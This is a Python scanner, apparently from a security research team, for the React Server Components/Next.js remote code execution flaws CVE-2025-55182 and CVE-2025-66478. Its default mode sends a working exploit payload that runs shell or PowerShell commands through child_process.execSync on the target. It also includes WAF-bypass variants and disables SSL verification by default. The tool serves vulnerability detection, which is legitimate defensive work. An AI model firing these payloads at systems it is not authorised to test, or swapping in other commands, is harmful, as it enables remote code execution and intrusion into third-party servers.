#!/usr/bin/env python3
"""
React2Shell Scanner - High Fidelity Detection for RSC/Next.js RCE
CVE-2025-55182 & CVE-2025-66478
Based on research from Assetnote Security Research Team.
"""
import argparse
import sys
import json
import os
import random
import re
import string
from datetime import datetime, timezone
from concurrent.futures import ThreadPoolExecutor, as_completed
from urllib.parse import urlparse
from typing import Optional
try:
import requests
from requests.exceptions import RequestException
except ImportError:
print("Error: 'requests' library required. Install with: pip install requests")
sys.exit(1)
try:
from tqdm import tqdm
except ImportError:
print("Error: 'tqdm' library required. Install with: pip install tqdm")
sys.exit(1)
class Colors:
RED = "\033[91m"
GREEN = "\033[92m"
YELLOW = "\033[93m"
BLUE = "\033[94m"
MAGENTA = "\033[95m"
CYAN = "\033[96m"
WHITE = "\033[97m"
BOLD = "\033[1m"
RESET = "\033[0m"
def colorize(text: str, color: str) -> str:
"""Apply color to text."""
return f"{color}{text}{Colors.RESET}"
def print_banner():
"""Print the tool banner."""
banner = f"""
{Colors.CYAN}{Colors.BOLD}brought to you by assetnote{Colors.RESET}
"""
print(banner)
def parse_headers(header_list: list[str] | None) -> dict[str, str]:
"""Parse a list of 'Key: Value' strings into a dict."""
headers = {}
if not header_list:
return headers
for header in header_list:
if ": " in header:
key, value = header.split(": ", 1)
headers[key] = value
elif ":" in header:
key, value = header.split(":", 1)
headers[key] = value.lstrip()
return headers
def normalize_host(host: str) -> str:
"""Normalize host to include scheme if missing."""
host = host.strip()
if not host:
return ""
if not host.startswith(("http://", "https://")):
host = f"https://{host}"
return host.rstrip("/")
def generate_junk_data(size_bytes: int) -> tuple[str, str]:
"""Generate random junk data for WAF bypass."""
param_name = ''.join(random.choices(string.ascii_lowercase, k=12))
junk = ''.join(random.choices(string.ascii_letters + string.digits, k=size_bytes))
return param_name, junk
def build_safe_payload() -> tuple[str, str]:
"""Build the safe multipart form data payload for the vulnerability check (side-channel)."""
boundary = "----WebKitFormBoundaryx8jO2oVc6SWP3Sad"
body = (
f"------WebKitFormBoundaryx8jO2oVc6SWP3Sad\r\n"
f'Content-Disposition: form-data; name="1"\r\n\r\n'
f"{{}}\r\n"
f"------WebKitFormBoundaryx8jO2oVc6SWP3Sad\r\n"
f'Content-Disposition: form-data; name="0"\r\n\r\n'
f'["$1:aa:aa"]\r\n'
f"------WebKitFormBoundaryx8jO2oVc6SWP3Sad--"
)
content_type = f"multipart/form-data; boundary={boundary}"
return body, content_type
def build_vercel_waf_bypass_payload() -> tuple[str, str]:
"""Build the Vercel WAF bypass multipart form data payload."""
boundary = "----WebKitFormBoundaryx8jO2oVc6SWP3Sad"
part0 = (
'{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,'
'"value":"{\\"then\\":\\"$B1337\\"}","_response":{"_prefix":'
'"var res=process.mainModule.require(\'child_process\').execSync(\'echo $((41*271))\').toString().trim();;'
'throw Object.assign(new Error(\'NEXT_REDIRECT\'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});",'
'"_chunks":"$Q2","_formData":{"get":"$3:\\"$$:constructor:constructor"}}}'
)
body = (
f"------WebKitFormBoundaryx8jO2oVc6SWP3Sad\r\n"
f'Content-Disposition: form-data; name="0"\r\n\r\n'
f"{part0}\r\n"
f"------WebKitFormBoundaryx8jO2oVc6SWP3Sad\r\n"
f'Content-Disposition: form-data; name="1"\r\n\r\n'
f'"$@0"\r\n'
f"------WebKitFormBoundaryx8jO2oVc6SWP3Sad\r\n"
f'Content-Disposition: form-data; name="2"\r\n\r\n'
f"[]\r\n"
f"------WebKitFormBoundaryx8jO2oVc6SWP3Sad\r\n"
f'Content-Disposition: form-data; name="3"\r\n\r\n'
f'{{"\\"\u0024\u0024":{{}}}}\r\n'
f"------WebKitFormBoundaryx8jO2oVc6SWP3Sad--"
)
content_type = f"multipart/form-data; boundary={boundary}"
return body, content_type
def build_rce_payload(windows: bool = False, waf_bypass: bool = False, waf_bypass_size_kb: int = 128) -> tuple[str, str]:
"""Build the RCE PoC multipart form data payload."""
boundary = "----WebKitFormBoundaryx8jO2oVc6SWP3Sad"
if windows:
# PowerShell payload - escape double quotes for JSON
cmd = 'powershell -c \\\"41*271\\\"'
else:
# Linux/Unix payload
cmd = 'echo $((41*271))'
prefix_payload = (
f"var res=process.mainModule.require('child_process').execSync('{cmd}')"
f".toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),"
f"{{digest: `NEXT_REDIRECT;push;/login?a=${{res}};307;`}});"
)
part0 = (
'{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,'
'"value":"{\\"then\\":\\"$B1337\\"}","_response":{"_prefix":"'
+ prefix_payload
+ '","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}'
)
parts = []
# Add junk data at the start if WAF bypass is enabled
if waf_bypass:
param_name, junk = generate_junk_data(waf_bypass_size_kb * 1024)
parts.append(
f"------WebKitFormBoundaryx8jO2oVc6SWP3Sad\r\n"
f'Content-Disposition: form-data; name="{param_name}"\r\n\r\n'
f"{junk}\r\n"
)
parts.append(
f"------WebKitFormBoundaryx8jO2oVc6SWP3Sad\r\n"
f'Content-Disposition: form-data; name="0"\r\n\r\n'
f"{part0}\r\n"
)
parts.append(
f"------WebKitFormBoundaryx8jO2oVc6SWP3Sad\r\n"
f'Content-Disposition: form-data; name="1"\r\n\r\n'
f'"$@0"\r\n'
)
parts.append(
f"------WebKitFormBoundaryx8jO2oVc6SWP3Sad\r\n"
f'Content-Disposition: form-data; name="2"\r\n\r\n'
f"[]\r\n"
)
parts.append("------WebKitFormBoundaryx8jO2oVc6SWP3Sad--")
body = "".join(parts)
content_type = f"multipart/form-data; boundary={boundary}"
return body, content_type
def resolve_redirects(url: str, timeout: int, verify_ssl: bool, max_redirects: int = 10) -> str:
"""Follow redirects only if they stay on the same host."""
current_url = url
original_host = urlparse(url).netloc
for _ in range(max_redirects):
try:
response = requests.head(
current_url,
timeout=timeout,
verify=verify_ssl,
allow_redirects=False
)
if response.status_code in (301, 302, 303, 307, 308):
location = response.headers.get("Location")
if location:
if location.startswith("/"):
# Relative redirect - same host, safe to follow
parsed = urlparse(current_url)
current_url = f"{parsed.scheme}://{parsed.netloc}{location}"
else:
# Absolute redirect - check if same host
new_host = urlparse(location).netloc
if new_host == original_host:
current_url = location
else:
break # Different host, stop following
else:
break
else:
break
except RequestException:
break
return current_url
def send_payload(target_url: str, headers: dict, body: str, timeout: int, verify_ssl: bool) -> tuple[requests.Response | None, str | None]:
"""Send the exploit payload to a URL. Returns (response, error)."""
try:
# Encode body as bytes to ensure proper Content-Length calculation
# and avoid potential encoding issues with the HTTP client
body_bytes = body.encode('utf-8') if isinstance(body, str) else body
response = requests.post(
target_url,
headers=headers,
data=body_bytes,
timeout=timeout,
verify=verify_ssl,
allow_redirects=False
)
return response, None
except requests.exceptions.SSLError as e:
return None, f"SSL Error: {str(e)}"
except requests.exceptions.ConnectionError as e:
return None, f"Connection Error: {str(e)}"
except requests.exceptions.Timeout:
return None, "Request timed out"
except RequestException as e:
return None, f"Request failed: {str(e)}"
except Exception as e:
return None, f"Unexpected error: {str(e)}"
def is_vulnerable_safe_check(response: requests.Response) -> bool:
"""Check if a response indicates vulnerability (safe side-channel check)."""
if response.status_code != 500 or 'E{"digest"' not in response.text:
return False
# Check for Vercel/Netlify mitigations (not valid findings)
server_header = response.headers.get("Server", "").lower()
has_netlify_vary = "Netlify-Vary" in response.headers
is_mitigated = (
has_netlify_vary
or server_header == "netlify"
or server_header == "vercel"
)
return not is_mitigated
def is_vulnerable_rce_check(response: requests.Response) -> bool:
"""Check if a response indicates vulnerability (RCE PoC check)."""
# Check for the X-Action-Redirect header with the expected value
redirect_header = response.headers.get("X-Action-Redirect", "")
return bool(re.search(r'.*/login\?a=11111.*', redirect_header))
def check_vulnerability(host: str, timeout: int = 10, verify_ssl: bool = True, follow_redirects: bool = True, custom_headers: dict[str, str] | None = None, safe_check: bool = False, windows: bool = False, waf_bypass: bool = False, waf_bypass_size_kb: int = 128, vercel_waf_bypass: bool = False) -> dict:
"""
Check if a host is vulnerable to CVE-2025-55182/CVE-2025-66478.
Tests root path first. If not vulnerable and redirects exist, tests redirect path.
Returns a dict with:
- host: the target host
- vulnerable: True/False/None (None if error)
- status_code: HTTP status code
- error: error message if any
- request: the raw request sent
- response: the raw response received
"""
result = {
"host": host,
"vulnerable": None,
"status_code": None,
"error": None,
"request": None,
"response": None,
"final_url": None,
"timestamp": datetime.now(timezone.utc).isoformat() + "Z"
}
host = normalize_host(host)
if not host:
result["error"] = "Invalid or empty host"
return result
root_url = f"{host}/"
if safe_check:
body, content_type = build_safe_payload()
is_vulnerable = is_vulnerable_safe_check
elif vercel_waf_bypass:
body, content_type = build_vercel_waf_bypass_payload()
is_vulnerable = is_vulnerable_rce_check
else:
body, content_type = build_rce_payload(windows=windows, waf_bypass=waf_bypass, waf_bypass_size_kb=waf_bypass_size_kb)
is_vulnerable = is_vulnerable_rce_check
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0",
"Next-Action": "x",
"X-Nextjs-Request-Id": "b5dce965",
"Content-Type": content_type,
"X-Nextjs-Html-Request-Id": "SSTMXm7OJ_g0Ncx6jpQt9",
}
# Apply custom headers (override defaults)
if custom_headers:
headers.update(custom_headers)
def build_request_str(url: str) -> str:
parsed = urlparse(url)
req_str = f"POST {'/aaa' or '/aaa'} HTTP/1.1\r\n"
req_str += f"Host: {parsed.netloc}\r\n"
for k, v in headers.items():
req_str += f"{k}: {v}\r\n"
req_str += f"Content-Length: {len(body)}\r\n\r\n"
req_str += body
return req_str
def build_response_str(resp: requests.Response) -> str:
resp_str = f"HTTP/1.1 {resp.status_code} {resp.reason}\r\n"
for k, v in resp.headers.items():
resp_str += f"{k}: {v}\r\n"
resp_str += f"\r\n{resp.text[:2000]}"
return resp_str
# First, test the root path
result["final_url"] = root_url
result["request"] = build_request_str(root_url)
response, error = send_payload(root_url, headers, body, timeout, verify_ssl)
if error:
result["error"] = error
return result
result["status_code"] = response.status_code
result["response"] = build_response_str(response)
if is_vulnerable(response):
result["vulnerable"] = True
return result
# Root not vulnerable - try redirect path if enabled
if follow_redirects:
try:
redirect_url = resolve_redirects(root_url, timeout, verify_ssl)
if redirect_url != root_url:
# Different path, test it
response, error = send_payload(redirect_url, headers, body, timeout, verify_ssl)
if error:
# Keep root result but note the redirect failed
result["vulnerable"] = False
return result
result["final_url"] = redirect_url
result["request"] = build_request_str(redirect_url)
result["status_code"] = response.status_code
result["response"] = build_response_str(response)
if is_vulnerable(response):
result["vulnerable"] = True
return result
except Exception:
pass # Continue with root result if redirect resolution fails
result["vulnerable"] = False
return result
def load_hosts(hosts_file: str) -> list[str]:
"""Load hosts from a file, one per line."""
hosts = []
try:
with open(hosts_file, "r") as f:
for line in f:
host = line.strip()
if host and not host.startswith("#"):
hosts.append(host)
except FileNotFoundError:
print(colorize(f"[ERROR] File not found: {hosts_file}", Colors.RED))
sys.exit(1)
except Exception as e:
print(colorize(f"[ERROR] Failed to read file: {e}", Colors.RED))
sys.exit(1)
return hosts
def save_results(results: list[dict], output_file: str, vulnerable_only: bool = True):
if vulnerable_only:
results = [r for r in results if r.get("vulnerable") is True]
output = {
"scan_time": datetime.now(timezone.utc).isoformat() + "Z",
"total_results": len(results),
"results": results
}
try:
with open(output_file, "w") as f:
json.dump(output, f, indent=2)
print(colorize(f"\n[+] Results saved to: {output_file}", Colors.GREEN))
except Exception as e:
print(colorize(f"\n[ERROR] Failed to save results: {e}", Colors.RED))
def print_result(result: dict, verbose: bool = False):
host = result["host"]
final_url = result.get("final_url")
redirected = final_url and final_url != f"{normalize_host(host)}/"
if result["vulnerable"] is True:
status = colorize("[VULNERABLE]", Colors.RED + Colors.BOLD)
print(f"{status} {colorize(host, Colors.WHITE)} - Status: {result['status_code']}")
if redirected:
print(f" -> Redirected to: {final_url}")
elif result["vulnerable"] is False:
status = colorize("[NOT VULNERABLE]", Colors.GREEN)
print(f"{status} {host} - Status: {result['status_code']}")
if redirected and verbose:
print(f" -> Redirected to: {final_url}")
else:
status = colorize("[ERROR]", Colors.YELLOW)
error_msg = result.get("error", "Unknown error")
print(f"{status} {host} - {error_msg}")
if verbose and result["vulnerable"]:
print(colorize(" Response snippet:", Colors.CYAN))
if result.get("response"):
lines = result["response"].split("\r\n")[:10]
for line in lines:
print(f" {line}")
def main():
parser = argparse.ArgumentParser(
description="React2Shell Scanner",
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog="""
Examples:
%(prog)s -u https://example.com
%(prog)s -l hosts.txt -t 20 -o results.json
%(prog)s -l hosts.txt --threads 50 --timeout 15
%(prog)s -u https://example.com -H "Authorization: Bearer token" -H "User-Agent: CustomAgent"
"""
)
input_group = parser.add_mutually_exclusive_group(required=True)
input_group.add_argument(
"-u", "--url",
help="Single URL/host to check"
)
input_group.add_argument(
"-l", "--list",
help="File containing list of hosts (one per line)"
)
parser.add_argument(
"-t", "--threads",
type=int,
default=10,
help="Number of concurrent threads (default: 10)"
)
parser.add_argument(
"--timeout",
type=int,
default=10,
help="Request timeout in seconds (default: 10)"
)
parser.add_argument(
"-o", "--output",
help="Output file for results (JSON format)"
)
parser.add_argument(
"--all-results",
action="store_true",
help="Save all results to output file, not just vulnerable hosts"
)
parser.add_argument(
"-k", "--insecure",
default=True,
action="store_true",
help="Disable SSL certificate verification"
)
parser.add_argument(
"-H", "--header",
action="append",
dest="headers",
metavar="HEADER",
help="Custom header in 'Key: Value' format (can be used multiple times)"
)
parser.add_argument(
"-v", "--verbose",
action="store_true",
help="Verbose output (show response snippets for vulnerable hosts)"
)
parser.add_argument(
"-q", "--quiet",
action="store_true",
help="Quiet mode (only show vulnerable hosts)"
)
parser.add_argument(
"--no-color",
action="store_true",
help="Disable colored output"
)
parser.add_argument(
"--safe-check",
action="store_true",
help="Use safe side-channel detection instead of RCE PoC"
)
parser.add_argument(
"--windows",
action="store_true",
help="Use Windows PowerShell payload instead of Unix shell"
)
parser.add_argument(
"--waf-bypass",
action="store_true",
help="Add junk data to bypass WAF content inspection (default: 128KB)"
)
parser.add_argument(
"--waf-bypass-size",
type=int,
default=128,
metavar="KB",
help="Size of junk data in KB for WAF bypass (default: 128)"
)
parser.add_argument(
"--vercel-waf-bypass",
action="store_true",
help="Use Vercel WAF bypass payload variant"
)
args = parser.parse_args()
if args.no_color or not sys.stdout.isatty():
Colors.RED = ""
Colors.GREEN = ""
Colors.YELLOW = ""
Colors.BLUE = ""
Colors.MAGENTA = ""
Colors.CYAN = ""
Colors.WHITE = ""
Colors.BOLD = ""
Colors.RESET = ""
if not args.quiet:
print_banner()
if args.url:
hosts = [args.url]
else:
hosts = load_hosts(args.list)
if not hosts:
print(colorize("[ERROR] No hosts to scan", Colors.RED))
sys.exit(1)
# Adjust timeout for WAF bypass mode
timeout = args.timeout
if args.waf_bypass and args.timeout == 10:
timeout = 20
if not args.quiet:
print(colorize(f"[*] Loaded {len(hosts)} host(s) to scan", Colors.CYAN))
print(colorize(f"[*] Using {args.threads} thread(s)", Colors.CYAN))
print(colorize(f"[*] Timeout: {timeout}s", Colors.CYAN))
if args.safe_check:
print(colorize("[*] Using safe side-channel check", Colors.CYAN))
else:
print(colorize("[*] Using RCE PoC check", Colors.CYAN))
if args.windows:
print(colorize("[*] Windows mode enabled (PowerShell payload)", Colors.CYAN))
if args.waf_bypass:
print(colorize(f"[*] WAF bypass enabled ({args.waf_bypass_size}KB junk data)", Colors.CYAN))
if args.vercel_waf_bypass:
print(colorize("[*] Vercel WAF bypass mode enabled", Colors.CYAN))
if args.insecure:
print(colorize("[!] SSL verification disabled", Colors.YELLOW))
print()
results = []
vulnerable_count = 0
error_count = 0
verify_ssl = not args.insecure
custom_headers = parse_headers(args.headers)
if args.insecure:
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
if len(hosts) == 1:
result = check_vulnerability(hosts[0], timeout, verify_ssl, custom_headers=custom_headers, safe_check=args.safe_check, windows=args.windows, waf_bypass=args.waf_bypass, waf_bypass_size_kb=args.waf_bypass_size, vercel_waf_bypass=args.vercel_waf_bypass)
results.append(result)
if not args.quiet or result["vulnerable"]:
print_result(result, args.verbose)
if result["vulnerable"]:
vulnerable_count = 1
else:
with ThreadPoolExecutor(max_workers=args.threads) as executor:
futures = {
executor.submit(check_vulnerability, host, timeout, verify_ssl, custom_headers=custom_headers, safe_check=args.safe_check, windows=args.windows, waf_bypass=args.waf_bypass, waf_bypass_size_kb=args.waf_bypass_size, vercel_waf_bypass=args.vercel_waf_bypass): host
for host in hosts
}
with tqdm(
total=len(hosts),
desc=colorize("Scanning", Colors.CYAN),
unit="host",
ncols=80,
disable=args.quiet
) as pbar:
for future in as_completed(futures):
result = future.result()
results.append(result)
if result["vulnerable"]:
vulnerable_count += 1
tqdm.write("")
print_result(result, args.verbose)
elif result["error"]:
error_count += 1
if not args.quiet and args.verbose:
tqdm.write("")
print_result(result, args.verbose)
elif not args.quiet and args.verbose:
tqdm.write("")
print_result(result, args.verbose)
pbar.update(1)
if not args.quiet:
print()
print(colorize("=" * 60, Colors.CYAN))
print(colorize("SCAN SUMMARY", Colors.BOLD))
print(colorize("=" * 60, Colors.CYAN))
print(f" Total hosts scanned: {len(hosts)}")
if vulnerable_count > 0:
print(f" {colorize(f'Vulnerable: {vulnerable_count}', Colors.RED + Colors.BOLD)}")
else:
print(f" Vulnerable: {vulnerable_count}")
print(f" Not vulnerable: {len(hosts) - vulnerable_count - error_count}")
print(f" Errors: {error_count}")
print(colorize("=" * 60, Colors.CYAN))
if args.output:
save_results(results, args.output, vulnerable_only=not args.all_results)
if vulnerable_count > 0:
sys.exit(1)
sys.exit(0)
if __name__ == "__main__":
main()